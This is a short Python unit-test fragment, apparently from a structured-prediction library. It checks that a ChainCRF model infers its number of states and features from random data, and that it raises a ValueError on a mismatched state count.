x = rnd.normal(size=(13, 5))
y = rnd.randint(3, size=13)
crf = ChainCRF(n_states=3, n_features=5)
crf.initialize([x], [y])
crf = ChainCRF()
crf.initialize([x], [y])
assert_equal(crf.n_states, 3)
assert_equal(crf.n_features, 5)
crf = ChainCRF(n_states=2)
    assert_raises(ValueError, crf.initialize, X=[x], Y=[y]) |